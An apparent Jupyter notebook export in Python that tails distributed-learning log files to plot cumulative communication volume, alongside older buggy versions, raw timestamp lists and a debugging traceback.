#print("min length: " + str(min_length))
#print([ts[:min_length] for ts in timestamps])
#print(timestamps)
#print([ts[:min_length] for ts in timestamps])
time_step = float(np.amax([ts[:min_length] for ts in timestamps]))
#print("maximal time step of cut list: "+ str(time_step))
# get data of registration and violation files up to this time step
#print("CHOSEN TIME STEP:" + str(time_step))
#check for registrations up to time_step
while True:
# check in buffer (if not empty)
while rlines_buffer != []: #as long as buffer is not empty
#print("checking this line in buffer", vlines_buffer[0])
if float(rlines_buffer[0][0].split("\t")[0]) <= time_step:
message_size = message_size + int(rlines_buffer[0][0].split("\t")[4])
#print("registration message from buffer added with ts " + str(float(rlines_buffer[0][0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
rlines_buffer.remove(rlines_buffer[0])
#print("buffer after deleting: ", vlines_buffer)
else: #if first element in buffer is too big then the others in the buffer as well as first elem is smallest
break
# read new lines
where = data_registrations.tell()
rline = data_registrations.readline()
if not rline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_registrations.seek(where)
break
else:
if float(rline.split("\t")[0]) <= time_step:
# here: index 4 = message size
message_size = message_size + int(rline.split("\t")[4])
#print("registration message added with ts " + str(float(rline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
rlines_buffer.append([rline])
break
#check for sendModels up to time_step
while True:
# check in buffer (if not empty)
while slines_buffer != []: #as long as buffer is not empty
if float(slines_buffer[0][0].split("\t")[0]) <= time_step:
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(slines_buffer[0][0].split("\t")[3])* slines_buffer[0][0].split("\t")[2].count(".")
#print("sendModel message from buffer added with ts " + str(float(slines_buffer[0][0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
slines_buffer.remove(slines_buffer[0])
else:
break
# read new lines
where = data_sendModel.tell()
sline = data_sendModel.readline()
if not sline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_sendModel.seek(where)
break
else:
if float(sline.split("\t")[0]) <= time_step:
# here: index 4 = message size
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline.split("\t")[3])* sline.split("\t")[2].count(".")
#print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
slines_buffer.append([sline])
break
#check for violations up to time_step
while True:
# check in buffer (if not empty)
#print("buffer", vlines_buffer)
while vlines_buffer != []: #as long as buffer is not empty
#print("checking this line in buffer", vlines_buffer[0])
if float(vlines_buffer[0][0].split("\t")[0]) <= time_step:
message_size = message_size + int(vlines_buffer[0][0].split("\t")[4])
#print("violation message from buffer added with ts " + str(float(vlines_buffer[0][0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
vlines_buffer.remove(vlines_buffer[0])
#print("buffer after deleting: ", vlines_buffer)
else: #if first element in buffer is too big then the others in the buffer as well as first elem is smallest
break
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
if not vline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_violations.seek(where)
break
else:
if float(vline.split("\t")[0]) <= time_step:
# here: index 4 = message size
print(vline)
message_size = message_size + int(vline.split("\t")[4])
#print("violation message added with ts " + str(float(vline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
#print("message_sizes: " + str(message_sizes))
if commonStep % displayStep == 0:
clear_output(wait=True)
#fig = plt.figure()
fig, ax = plt.subplots(1)
plt.plot(t, message_sizes, lw=4, label='cumulative communication', color='blue')
#plt.legend(loc='upper center')
plt.grid()
plt.xlim(0,260)
plt.ylim(0,3.5*1e9)
plt.tick_params(colors=(0,0,0,0))
plt.show()
t.append(t[-1] + 1)
if len(t) % recordStep == 0 and t != 0:
j = 0
if recordUnique:
extent = ax.get_window_extent().transformed(plt.gcf().dpi_scale_trans.inverted())
#gca().set_axis_off()
#plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0, hspace = 0, wspace = 0)
#plt.margins(0,0)
#plt.gca().xaxis.set_major_locator(matplotlib.ticker.NullLocator())
#plt.gca().yaxis.set_major_locator(matplotlib.ticker.NullLocator())
fig.savefig(os.path.join(experimentFolder, 'layout_cumulative_communication' + str(len(t)) + '.png'), dpi=100,bbox_inches=extent)
else:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
j += 1
```
## Old: Buffer here behaved wrongly: after deleting, the first element didn't get checked
```
files = []
timestamps = []
for i in range(nodesAmount):
files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
timestamps.append([])
t = [0]
commonStep = 0
displayStep = 5
recordStep = 1
recordUnique = True
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
fig = plt.figure()
while 1:
for i in range(nodesAmount):
file = files[i]
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
timestamps[i].append(float(line.split('\t')[0]))
currentStep = min([len(ts) for ts in timestamps]) #minimum not needed? just length of any list; because above always one timestamp gets inserted per worker
if currentStep > commonStep: #if everywhere has been written something
commonStep = currentStep
# get synchr timestamp
# MAYBE IT IS NOT NECESSARY TO CHECK ALL OF THE TIME STAMPS BUT JUST TAKE THOSE OF LAST WORKER...
# now need to find the largest timestamp; so first of all the worker with most of the time stamps and in there the largest
if sum(np.array([len(ts) for ts in timestamps])-max([len(ts) for ts in timestamps]))==0: #then all lengths are equal
#print("equal lengths")
#print(timestamps)
time_step = float(np.amax(timestamps))
#print("maximal time step: " + str(time_step))
else:
print("")
print("different lengths")
print("")
min_length = min([len(ts) for ts in timestamps])
# cut lists until min length and take maximal time stamp
#print("min length: " + str(min_length))
#print([ts[:min_length] for ts in timestamps])
#print(timestamps)
#print([ts[:min_length] for ts in timestamps])
time_step = float(np.amax([ts[:min_length] for ts in timestamps]))
#print("maximal time step of cut list: "+ str(time_step))
# get data of registration and violation files up to this time step
print("CHOSEN TIME STEP:" + str(time_step))
#check for registrations up to time_step
while True:
# check in buffer (if not empty)
if rlines_buffer != []:
for rline in rlines_buffer:
if float(rline[0].split("\t")[0]) <= time_step:
message_size = message_size + int(rline[0].split("\t")[4])
#print("registration message from buffer added with ts " + str(float(rline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
rlines_buffer.remove(rline)
# read new lines
where = data_registrations.tell()
rline = data_registrations.readline()
if not rline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_registrations.seek(where)
break
else:
if float(rline.split("\t")[0]) <= time_step:
# here: index 4 = message size
message_size = message_size + int(rline.split("\t")[4])
#print("registration message added with ts " + str(float(rline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
rlines_buffer.append([rline])
break
#check for sendModels up to time_step
while True:
# check in buffer (if not empty)
if slines_buffer != []:
for sline in slines_buffer:
if float(sline[0].split("\t")[0]) <= time_step:
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline[0].split("\t")[3])* sline[0].split("\t")[2].count(".")
#print("sendModel message from buffer added with ts " + str(float(sline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
slines_buffer.remove(sline)
# read new lines
where = data_sendModel.tell()
sline = data_sendModel.readline()
if not sline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_sendModel.seek(where)
break
else:
if float(sline.split("\t")[0]) <= time_step:
# here: index 4 = message size
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline.split("\t")[3])* sline.split("\t")[2].count(".")
#print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
slines_buffer.append([sline])
break
#check for violations up to time_step
while True:
# check in buffer (if not empty)
print("buffer", vlines_buffer)
#if vlines_buffer != []:
#for vline in vlines_buffer:
# print("checking this line in buffer", vline)
# if float(vline[0].split("\t")[0]) <= time_step:
# message_size = message_size + int(vline[0].split("\t")[4])
# print("violation message from buffer added with ts " + str(float(vline[0].split("\t")[0])))
# print("message_size: " + str(message_size))
# # delete message from buffer
# vlines_buffer.remove(vline)
# print("buffer after deleting: ", vlines_buffer)
while vlines_buffer != []: #as long as buffer is not empty
print("checking this line in buffer", vlines_buffer[0])
if float(vlines_buffer[0][0].split("\t")[0]) <= time_step:
message_size = message_size + int(vlines_buffer[0][0].split("\t")[4])
print("violation message from buffer added with ts " + str(float(vlines_buffer[0][0].split("\t")[0])))
print("message_size: " + str(message_size))
# delete message from buffer
vlines_buffer.remove(vlines_buffer[0])
print("buffer after deleting: ", vlines_buffer)
else: #if first element in buffer is too big then the others in the buffer as well as first elem is smallest
break
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
print("new line: " , vline)
if not vline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_violations.seek(where)
break
else:
if float(vline.split("\t")[0]) <= time_step:
# here: index 4 = message size
message_size = message_size + int(vline.split("\t")[4])
print("violation message added with ts " + str(float(vline.split("\t")[0])))
print("message_size: " + str(message_size))
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
print("message_sizes: " + str(message_sizes))
if commonStep % displayStep == 0:
#clear_output(wait=True)
fig = plt.figure()
plt.plot(t, message_sizes, lw=2, label='cumulative communication', color='blue')
plt.legend(loc='upper center')
plt.grid()
plt.show()
t.append(t[-1] + 1)
if len(t) % recordStep == 0 and t != 0:
j = 0
#if recordUnique:
#fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(len(t)) + '.png'), dpi=100)
#else:
#fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
j += 1
```
## OLD
```
files = []
timestamps = []
for i in range(nodesAmount):
files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
timestamps.append([])
t = [0]
commonStep = 0
displayStep = 5
recordStep = 1
recordUnique = True
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
fig = plt.figure()
while 1:
for i in range(nodesAmount):
file = files[i]
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
timestamps[i].append(float(line.split('\t')[0]))
currentStep = min([len(ts) for ts in timestamps]) #minimum not needed? just length of any list; because above always one timestamp gets inserted per worker
if currentStep > commonStep: #if everywhere has been written something. Don't we wait above anyway such that everyone has something to plot?
commonStep = currentStep
if type(np.amax(timestamps))== list:
print("argmax" + str(np.amax(timestamps)))
print("timestamps" + str(timestamps))
time_step = float(np.amax(timestamps))
# get data of registration and violation files up to this time step
#print("CHOSEN TIME STEP:" + str(time_step))
while True:
# check in buffer (if not empty)
if rlines_buffer != []:
for rline in rlines_buffer:
if float(rline[0].split("\t")[0]) < time_step:
message_size = message_size + int(rline[0].split("\t")[4])
#print("registration message from buffer added with ts " + str(float(rline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
rlines_buffer.remove(rline)
# read new lines
where = data_registrations.tell()
rline = data_registrations.readline()
if not rline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_registrations.seek(where)
break
else:
if float(rline.split("\t")[0]) < time_step:
# here: index 4 = message size
message_size = message_size + int(rline.split("\t")[4])
#print("registration message added with ts " + str(float(rline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
rlines_buffer.append([rline])
break
#check for sendModels up to time_step
while True:
# check in buffer (if not empty)
if slines_buffer != []:
for sline in slines_buffer:
if float(sline[0].split("\t")[0]) < time_step:
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline[0].split("\t")[3])* sline[0].split("\t")[2].count(".")
#print("sendModel message from buffer added with ts " + str(float(sline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
slines_buffer.remove(sline)
# read new lines
where = data_sendModel.tell()
sline = data_sendModel.readline()
if not sline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_sendModel.seek(where)
break
else:
if float(sline.split("\t")[0]) < time_step:
# here: index 4 = message size
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline.split("\t")[3])* sline.split("\t")[2].count(".")
#print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
slines_buffer.append([sline])
break
#check for violations up to time_step
while True:
# check in buffer (if not empty)
if vlines_buffer != []:
for vline in vlines_buffer:
if float(vline[0].split("\t")[0]) < time_step:
message_size = message_size + int(vline[0].split("\t")[4])
#print("violation message from buffer added with ts " + str(float(vline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
vlines_buffer.remove(vline)
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
if not vline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_violations.seek(where)
break
else:
if float(vline.split("\t")[0]) < time_step:
# here: index 4 = message size
message_size = message_size + int(vline.split("\t")[4])
#print("violation message added with ts " + str(float(vline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
#print("message_sizes: " + str(message_sizes))
if commonStep % displayStep == 0:
clear_output(wait=True)
fig = plt.figure()
plt.plot(t, message_sizes, lw=2, label='cumulative communication', color='blue')
plt.legend(loc='upper center')
plt.grid()
plt.show()
t.append(t[-1] + 1)
if len(t) % recordStep == 0 and t != 0:
j = 0
if recordUnique:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(len(t)) + '.png'), dpi=100)
else:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
j += 1
ts = [[1539343806.652, 1539343812.847, 1539343819.346, 1539343825.397, 1539343831.715, 1539343837.967, 1539343844.19, 1539343850.423, 1539343856.422, 1539343863.308, 1539343869.481, 1539343875.663, 1539343882.009, 1539343888.307, 1539343894.505, 1539343901.488, 1539343907.72, 1539343913.827, 1539343920.114, 1539343926.423, 1539343932.638, 1539343938.873, 1539343945.885, 1539343952.147, 1539343958.442, 1539343964.822, 1539343971.053, 1539343977.184, 1539343983.303, 1539343989.544, 1539343995.69, 1539344001.867, 1539344007.992, 1539344014.123, 1539344028.389, 1539344029.341, 1539344033.626, 1539344039.913, 1539344046.111, 1539344052.302, 1539344058.663, 1539344064.805, 1539344070.965, 1539344077.201, 1539344083.482, 1539344089.662, 1539344095.908, 1539344102.257, 1539344108.387, 1539344114.703, 1539344120.914, 1539344127.106, 1539344133.268, 1539344139.434, 1539344145.614, 1539344152.012, 1539344158.125, 1539344164.437, 1539344170.915, 1539344177.116, 1539344183.136, 1539344189.207, 1539344195.278, 1539344201.424, 1539344207.704, 1539344213.885, 1539344220.115, 1539344226.34, 1539344232.602, 1539344238.755, 1539344245.066, 1539344251.171, 1539344257.414, 1539344263.577, 1539344269.74, 1539344275.996, 1539344282.205, 1539344288.433, 1539344294.664, 1539344300.851, 1539344306.976, 1539344313.168, 1539344319.228, 1539344325.412, 1539344331.612, 1539344337.799, 1539344344.087, 1539344350.344, 1539344356.635, 1539344362.875, 1539344369.176, 1539344375.356, 1539344381.63, 1539344387.763, 1539344394.126, 1539344400.333, 1539344406.515, 1539344412.625, 1539344418.836, 1539344425.013, 1539344431.124, 1539344437.392, 1539344443.627, 1539344450.049, 1539344456.154, 1539344462.299, 1539344468.676, 1539344474.73, 1539344480.79, 1539344487.203, 1539344493.393, 1539344499.667, 1539344506.033, 1539344512.226, 1539344518.561, 1539344524.825, 1539344530.905, 1539344536.967, 1539344543.049, 1539344549.218, 1539344555.348, 1539344561.624, 1539344567.85, 1539344574.047, 1539344580.119, 1539344586.298, 1539344592.512, 1539344598.719, 1539344604.924, 1539344611.083, 1539344617.327, 1539344623.623, 1539344629.892, 1539344635.978, 1539344642.194, 1539344648.407, 1539344654.533, 1539344660.896, 1539344667.043, 1539344673.328, 1539344679.491, 1539344685.977, 1539344692.444, 1539344698.847, 1539344705.745, 1539344712.12, 1539344718.457, 1539344724.761], [1539343802.776, 1539343808.776, 1539343814.743, 1539343821.31, 1539343827.511, 1539343833.911, 1539343840.227, 1539343858.692, 1539343859.699, 1539343860.606, 1539343865.709, 1539343872.145, 1539343878.373, 1539343896.72, 1539343897.667, 1539343898.601, 1539343904.419, 1539343910.416, 1539343916.445, 1539343941.047, 1539343941.963, 1539343942.91, 1539343943.829, 1539343948.49, 1539343954.778, 1539343961.274, 1539343967.577, 1539343973.53, 1539343979.78, 1539344028.332, 1539344029.214, 1539344030.243, 1539344031.21, 1539344032.172, 1539344033.081, 1539344034.018, 1539344035.058, 1539344036.464, 1539344042.64, 1539344048.996, 1539344055.146, 1539344061.469, 1539344067.597, 1539344073.489, 1539344079.526, 1539344086.053, 1539344092.433, 1539344098.794, 1539344105.146, 1539344111.361, 1539344117.551, 1539344123.878, 1539344130.147, 1539344136.519, 1539344142.774, 1539344148.997, 1539344155.32, 1539344161.681, 1539344168.107, 1539344174.323, 1539344180.438, 1539344186.572, 1539344192.764, 1539344198.814, 1539344204.892, 1539344210.8, 1539344216.884, 1539344223.145, 1539344229.432, 1539344235.76, 1539344242.043, 1539344248.224, 1539344254.191, 1539344260.567, 1539344266.705, 1539344272.663, 1539344278.879, 1539344285.21, 1539344291.466, 1539344297.713, 1539344303.912, 1539344310.155, 1539344316.099, 1539344322.271, 1539344328.374, 1539344334.571, 1539344340.724, 1539344346.879, 1539344352.859, 1539344359.317, 1539344365.683, 1539344371.813, 1539344377.99, 1539344384.034, 1539344390.232, 1539344396.609, 1539344402.958, 1539344409.166, 1539344415.388, 1539344421.57, 1539344427.814, 1539344433.956, 1539344439.895, 1539344446.497, 1539344452.689, 1539344458.751, 1539344464.86, 1539344470.89, 1539344477.088, 1539344483.21, 1539344489.591, 1539344495.869, 1539344502.167, 1539344508.397, 1539344514.842, 1539344521.102, 1539344527.428, 1539344533.794, 1539344539.841, 1539344545.951, 1539344551.868, 1539344557.88, 1539344563.853, 1539344569.848, 1539344575.927, 1539344582.033, 1539344588.302, 1539344594.56, 1539344600.871, 1539344607.028, 1539344612.978, 1539344619.054, 1539344625.25, 1539344631.482, 1539344637.699, 1539344643.754, 1539344650.015, 1539344655.998, 1539344662.15, 1539344668.282, 1539344674.28, 1539344680.599, 1539344686.686, 1539344693.01, 1539344699.238, 1539344705.961, 1539344712.556, 1539344719.062, 1539344725.545], [1539343806.466, 1539343812.594, 1539343818.924, 1539343825.291, 1539343831.38, 1539343837.705, 1539343843.818, 1539343850.144, 1539343858.679, 1539343863.581, 1539343869.854, 1539343876.07, 1539343882.165, 1539343888.192, 1539343894.395, 1539343901.457, 1539343907.814, 1539343914.081, 1539343920.345, 1539343926.324, 1539343932.271, 1539343938.569, 1539343945.669, 1539343951.841, 1539343958.01, 1539343964.344, 1539343970.642, 1539343976.978, 1539343983.401, 1539343989.434, 1539343995.577, 1539344001.684, 1539344007.812, 1539344013.936, 1539344020.044, 1539344026.034, 1539344033.44, 1539344039.796, 1539344045.978, 1539344052.098, 1539344058.418, 1539344064.689, 1539344070.81, 1539344076.942, 1539344082.982, 1539344089.336, 1539344095.356, 1539344102.04, 1539344108.156, 1539344114.186, 1539344120.388, 1539344126.61, 1539344132.871, 1539344139.059, 1539344145.493, 1539344151.907, 1539344158.223, 1539344164.359, 1539344170.768, 1539344177.104, 1539344183.307, 1539344189.446, 1539344195.466, 1539344201.66, 1539344207.818, 1539344214.055, 1539344220.36, 1539344226.591, 1539344232.837, 1539344239.16, 1539344245.489, 1539344251.71, 1539344257.897, 1539344264.034, 1539344270.111, 1539344276.298, 1539344282.61, 1539344288.859, 1539344294.908, 1539344301.504, 1539344307.765, 1539344313.868, 1539344320.187, 1539344326.411, 1539344332.577, 1539344338.578, 1539344344.8, 1539344351.035, 1539344357.209, 1539344363.415, 1539344369.758, 1539344375.884, 1539344382.049, 1539344388.216, 1539344394.291, 1539344400.498, 1539344406.857, 1539344413.102, 1539344419.242, 1539344425.292, 1539344431.318, 1539344437.555, 1539344443.787, 1539344449.965, 1539344456.037, 1539344462.192, 1539344468.415, 1539344474.553, 1539344480.872, 1539344486.973, 1539344493.307, 1539344499.56, 1539344505.798, 1539344512.034, 1539344518.203, 1539344524.314, 1539344530.377, 1539344536.567, 1539344542.774, 1539344549.003, 1539344555.249, 1539344561.492, 1539344567.593, 1539344573.742, 1539344580.02, 1539344586.047, 1539344592.341, 1539344598.466, 1539344604.658, 1539344610.763, 1539344616.883, 1539344622.999, 1539344629.085, 1539344635.245, 1539344641.447, 1539344647.471, 1539344653.756, 1539344659.806, 1539344666.051, 1539344672.142, 1539344678.282, 1539344684.308, 1539344690.537, 1539344696.797, 1539344703.116, 1539344709.736, 1539344716.096, 1539344722.665, 1539344729.096], [1539343806.652, 1539343812.925, 1539343819.572, 1539343825.816, 1539343832.508, 1539343838.715, 1539343844.966, 1539343851.247, 1539343858.548, 1539343864.379, 1539343870.749, 1539343877.165, 1539343883.429, 1539343889.468, 1539343896.74, 1539343902.85, 1539343908.945, 1539343915.216, 1539343921.473, 1539343927.597, 1539343933.736, 1539343941.012, 1539343946.794, 1539343952.691, 1539343958.936, 1539343965.406, 1539343971.728, 1539343977.927, 1539343984.098, 1539343990.571, 1539343996.999, 1539344003.293, 1539344009.598, 1539344028.389, 1539344029.436, 1539344030.462, 1539344036.056, 1539344042.289, 1539344048.457, 1539344054.568, 1539344060.934, 1539344067.16, 1539344073.367, 1539344079.658, 1539344086.162, 1539344092.574, 1539344098.7, 1539344104.707, 1539344110.926, 1539344117.048, 1539344123.166, 1539344129.501, 1539344135.77, 1539344142.034, 1539344148.356, 1539344154.707, 1539344160.798, 1539344166.774, 1539344172.993, 1539344179.126, 1539344185.378, 1539344191.482, 1539344197.642, 1539344203.9, 1539344210.317, 1539344216.777, 1539344222.842, 1539344229.191, 1539344235.627, 1539344242.129, 1539344248.443, 1539344254.819, 1539344260.926, 1539344266.979, 1539344272.995, 1539344279.166, 1539344285.497, 1539344291.759, 1539344298.02, 1539344304.235, 1539344310.294, 1539344316.345, 1539344322.554, 1539344328.802, 1539344335.031, 1539344341.3, 1539344347.38, 1539344353.634, 1539344359.995, 1539344366.242, 1539344372.598, 1539344378.836, 1539344385.118, 1539344391.38, 1539344397.669, 1539344404.066, 1539344410.225, 1539344416.176, 1539344422.21, 1539344428.357, 1539344434.522, 1539344440.548, 1539344446.391, 1539344452.471, 1539344458.54, 1539344464.923, 1539344471.291, 1539344477.435, 1539344483.608, 1539344490.024, 1539344496.273, 1539344502.626, 1539344509.011, 1539344515.418, 1539344521.522, 1539344527.88, 1539344534.039, 1539344540.393, 1539344546.724, 1539344553.07, 1539344559.493, 1539344565.893, 1539344572.244, 1539344578.515, 1539344584.661, 1539344591.042, 1539344597.115, 1539344603.136, 1539344609.2, 1539344615.479, 1539344621.769, 1539344627.925, 1539344634.231, 1539344640.505, 1539344646.715, 1539344653.187, 1539344659.418, 1539344665.656, 1539344671.942, 1539344678.078, 1539344684.431, 1539344690.792, 1539344697.184, 1539344703.567, 1539344710.123, 1539344716.594, 1539344722.998, 1539344729.236]]
len(ts)
np.array([np.array(elem) for elem in ts]).flatten()
np.array([]).flatten()
np.array(ts).flatten
max()1
np.amax(ts)
TypeError Traceback (most recent call last)
<ipython-input-243-1167ee3da39d> in <module>()
37 commonStep = currentStep
38
---> 39 time_step = float(np.amax(timestamps))
40
41 # get data of registration and violation files up to this time step
TypeError: float() argument must be a string or a number, not 'list'
[[1539343806.652, 1539343812.847, 1539343819.346, 1539343825.397, 1539343831.715, 1539343837.967, 1539343844.19, 1539343850.423, 1539343856.422, 1539343863.308, 1539343869.481, 1539343875.663, 1539343882.009, 1539343888.307, 1539343894.505, 1539343901.488, 1539343907.72, 1539343913.827, 1539343920.114, 1539343926.423, 1539343932.638, 1539343938.873, 1539343945.885, 1539343952.147, 1539343958.442, 1539343964.822, 1539343971.053, 1539343977.184, 1539343983.303, 1539343989.544, 1539343995.69, 1539344001.867, 1539344007.992, 1539344014.123, 1539344028.389, 1539344029.341, 1539344033.626, 1539344039.913, 1539344046.111, 1539344052.302, 1539344058.663, 1539344064.805, 1539344070.965, 1539344077.201, 1539344083.482, 1539344089.662, 1539344095.908, 1539344102.257, 1539344108.387, 1539344114.703, 1539344120.914, 1539344127.106, 1539344133.268, 1539344139.434, 1539344145.614, 1539344152.012, 1539344158.125, 1539344164.437, 1539344170.915, 1539344177.116, 1539344183.136, 1539344189.207, 1539344195.278, 1539344201.424, 1539344207.704, 1539344213.885, 1539344220.115, 1539344226.34, 1539344232.602, 1539344238.755, 1539344245.066, 1539344251.171, 1539344257.414, 1539344263.577, 1539344269.74, 1539344275.996, 1539344282.205, 1539344288.433, 1539344294.664, 1539344300.851, 1539344306.976, 1539344313.168, 1539344319.228, 1539344325.412, 1539344331.612, 1539344337.799, 1539344344.087, 1539344350.344, 1539344356.635, 1539344362.875, 1539344369.176, 1539344375.356, 1539344381.63, 1539344387.763, 1539344394.126, 1539344400.333, 1539344406.515, 1539344412.625, 1539344418.836, 1539344425.013, 1539344431.124, 1539344437.392, 1539344443.627, 1539344450.049, 1539344456.154, 1539344462.299, 1539344468.676, 1539344474.73, 1539344480.79, 1539344487.203, 1539344493.393, 1539344499.667, 1539344506.033, 1539344512.226, 1539344518.561, 1539344524.825, 1539344530.905, 1539344536.967, 1539344543.049, 1539344549.218, 1539344555.348, 1539344561.624, 1539344567.85, 1539344574.047, 1539344580.119, 1539344586.298, 1539344592.512, 1539344598.719, 1539344604.924, 1539344611.083, 1539344617.327, 1539344623.623, 1539344629.892, 1539344635.978, 1539344642.194, 1539344648.407, 1539344654.533, 1539344660.896, 1539344667.043, 1539344673.328, 1539344679.491, 1539344685.977, 1539344692.444, 1539344698.847, 1539344705.745, 1539344712.12, 1539344718.457, 1539344724.761], [1539343802.776, 1539343808.776, 1539343814.743, 1539343821.31, 1539343827.511, 1539343833.911, 1539343840.227, 1539343858.692, 1539343859.699, 1539343860.606, 1539343865.709, 1539343872.145, 1539343878.373, 1539343896.72, 1539343897.667, 1539343898.601, 1539343904.419, 1539343910.416, 1539343916.445, 1539343941.047, 1539343941.963, 1539343942.91, 1539343943.829, 1539343948.49, 1539343954.778, 1539343961.274, 1539343967.577, 1539343973.53, 1539343979.78, 1539344028.332, 1539344029.214, 1539344030.243, 1539344031.21, 1539344032.172, 1539344033.081, 1539344034.018, 1539344035.058, 1539344036.464, 1539344042.64, 1539344048.996, 1539344055.146, 1539344061.469, 1539344067.597, 1539344073.489, 1539344079.526, 1539344086.053, 1539344092.433, 1539344098.794, 1539344105.146, 1539344111.361, 1539344117.551, 1539344123.878, 1539344130.147, 1539344136.519, 1539344142.774, 1539344148.997, 1539344155.32, 1539344161.681, 1539344168.107, 1539344174.323, 1539344180.438, 1539344186.572, 1539344192.764, 1539344198.814, 1539344204.892, 1539344210.8, 1539344216.884, 1539344223.145, 1539344229.432, 1539344235.76, 1539344242.043, 1539344248.224, 1539344254.191, 1539344260.567, 1539344266.705, 1539344272.663, 1539344278.879, 1539344285.21, 1539344291.466, 1539344297.713, 1539344303.912, 1539344310.155, 1539344316.099, 1539344322.271, 1539344328.374, 1539344334.571, 1539344340.724, 1539344346.879, 1539344352.859, 1539344359.317, 1539344365.683, 1539344371.813, 1539344377.99, 1539344384.034, 1539344390.232, 1539344396.609, 1539344402.958, 1539344409.166, 1539344415.388, 1539344421.57, 1539344427.814, 1539344433.956, 1539344439.895, 1539344446.497, 1539344452.689, 1539344458.751, 1539344464.86, 1539344470.89, 1539344477.088, 1539344483.21, 1539344489.591, 1539344495.869, 1539344502.167, 1539344508.397, 1539344514.842, 1539344521.102, 1539344527.428, 1539344533.794, 1539344539.841, 1539344545.951, 1539344551.868, 1539344557.88, 1539344563.853, 1539344569.848, 1539344575.927, 1539344582.033, 1539344588.302, 1539344594.56, 1539344600.871, 1539344607.028, 1539344612.978, 1539344619.054, 1539344625.25, 1539344631.482, 1539344637.699, 1539344643.754, 1539344650.015, 1539344655.998, 1539344662.15, 1539344668.282, 1539344674.28, 1539344680.599, 1539344686.686, 1539344693.01, 1539344699.238, 1539344705.961, 1539344712.556, 1539344719.062, 1539344725.545], [1539343806.466, 1539343812.594, 1539343818.924, 1539343825.291, 1539343831.38, 1539343837.705, 1539343843.818, 1539343850.144, 1539343858.679, 1539343863.581, 1539343869.854, 1539343876.07, 1539343882.165, 1539343888.192, 1539343894.395, 1539343901.457, 1539343907.814, 1539343914.081, 1539343920.345, 1539343926.324, 1539343932.271, 1539343938.569, 1539343945.669, 1539343951.841, 1539343958.01, 1539343964.344, 1539343970.642, 1539343976.978, 1539343983.401, 1539343989.434, 1539343995.577, 1539344001.684, 1539344007.812, 1539344013.936, 1539344020.044, 1539344026.034, 1539344033.44, 1539344039.796, 1539344045.978, 1539344052.098, 1539344058.418, 1539344064.689, 1539344070.81, 1539344076.942, 1539344082.982, 1539344089.336, 1539344095.356, 1539344102.04, 1539344108.156, 1539344114.186, 1539344120.388, 1539344126.61, 1539344132.871, 1539344139.059, 1539344145.493, 1539344151.907, 1539344158.223, 1539344164.359, 1539344170.768, 1539344177.104, 1539344183.307, 1539344189.446, 1539344195.466, 1539344201.66, 1539344207.818, 1539344214.055, 1539344220.36, 1539344226.591, 1539344232.837, 1539344239.16, 1539344245.489, 1539344251.71, 1539344257.897, 1539344264.034, 1539344270.111, 1539344276.298, 1539344282.61, 1539344288.859, 1539344294.908, 1539344301.504, 1539344307.765, 1539344313.868, 1539344320.187, 1539344326.411, 1539344332.577, 1539344338.578, 1539344344.8, 1539344351.035, 1539344357.209, 1539344363.415, 1539344369.758, 1539344375.884, 1539344382.049, 1539344388.216, 1539344394.291, 1539344400.498, 1539344406.857, 1539344413.102, 1539344419.242, 1539344425.292, 1539344431.318, 1539344437.555, 1539344443.787, 1539344449.965, 1539344456.037, 1539344462.192, 1539344468.415, 1539344474.553, 1539344480.872, 1539344486.973, 1539344493.307, 1539344499.56, 1539344505.798, 1539344512.034, 1539344518.203, 1539344524.314, 